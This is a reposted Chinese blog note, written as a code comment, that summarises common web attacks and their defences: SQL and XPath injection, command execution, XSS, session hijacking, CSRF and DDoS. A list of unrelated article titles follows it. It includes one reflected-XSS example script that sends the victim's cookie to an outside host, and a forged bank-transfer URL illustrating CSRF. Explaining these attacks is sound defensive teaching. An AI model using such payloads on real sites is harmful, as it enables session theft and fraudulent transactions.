web安全
来源:互联网 发布:linux 查找目录 编辑:程序博客网 时间:2024/05/22 05:29
/** * 包括了SQL注入、XPath注入、cgi命令执行, * 还有XXS和会话劫持等。前三个的攻击主要是在服务端触发的,后二者的攻击则是侧重于客户端。 * * 对于SQL注入、XPath注入、cgi命令执行这几个攻击,我们需要做的自然是对提交参数的过滤, * 最好是前端过滤一遍,后端也过滤一遍(后端的过滤和拦截是最重要的,毕竟通过在浏览器禁用脚本的配置可以躲过前端的过滤)。 * * XSS(cross-site scripting跨域脚本攻击)攻击也是最常见的WEB攻击之一 * 通过QQ群,或者通过群发垃圾邮件,来让其他人点击这个地址: 'book.com/search?name=<script>document.location='http://vajoy/get?cookie='+document.cookie</scrip这种便是XSS攻击中的一种,称为“Reflected XSS”——基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起WEB攻击。 * * 会话劫持的预防,可以走SSH协议、增强网络安全系统健壮性,也可以使用无序的UUID来替代通讯中的序列号码(而非逐步递增) * * CSRF(Cross Site Request Forgery),即跨站请求伪造,是一种常见的Web攻击, * 举个简单的例子来说明下CSRF的危害。用户登陆某银行网站,以Get请求的方式完成到另一银行的转账, * 如:http://www.mybank.com/Transfer.php?toBankId=11&money=1000。 * 攻击者可构造另一危险链接http://www.mybank.com/Transfer.php?toUserId=100&money=1000并把该链接通过 * 一定方式发给受害者用户。受害者用户若在浏览器打开此链接,会将之前登陆后的cookie信息一起发送给银行网站, * 服务器在接收到该请求后,确认cookie信息无误,会完成改请求操作,造成攻击行为完成。 * 攻击者可以构造CGI的每一个参数,伪造请求。这也是存在CSRF漏洞的最本质原因。 * * * 1. 永远不要相信客户端传来的任何信息,对这些信息都应先进行编码或过滤处理; * 2. https 替换http * 3. 对提交参数前台进行校验过滤 * 4. 对提交参数后台进行校验过滤(比如价格计算) * 5。DDOS是利用一批受控制的僵尸主机向一台服务器主机发起的攻击,其攻击的强度和造成的威胁要比DOS严重很多,更具破坏性。 * 控制ip的访问,设立黑名单,如:maven中心仓库 * 6。XSS防范方法,代码里对用户输入的地方和变量都需要仔细检查长度和对”<”,”>”,”;”,”’”等字符做过滤, * 避免直接在cookie 中泄露用户隐私,例如email、密码等等 * 7。对于CSRF攻击应用程序和用户进行交互过程中,特别是账户交易这种核心步骤,强制用户输入验证码, * 才能完成最终请求。在通常情况下,验证码够很好地遏制CSRF攻击 * * */
0 0
- web安全
- web安全
- web安全
- WEB安全
- Web安全
- web安全
- web安全
- Web安全
- WEB安全
- WEB安全
- Web安全
- web安全
- web安全
- web安全
- web 安全
- web安全
- WEB安全
- Web安全
- quartz定时任务时间设置
- SpringBoot 07 之JPA使用
- pch文件的正确使用
- #leetcode#515. Find Largest Element in Each Row
- js 对象判空
- web安全
- sphinx分布式索引简介
- Redis增加或删除节点
- redis入门——Spring整合篇
- SpringMVC 返回Java8 时间JSON数据的格式化问题处理
- it 自学编程在线网站-----java python js node.js c c++ android ios
- 爬虫学习记录(一)
- 矩阵的逆
- 禅道项目管理简介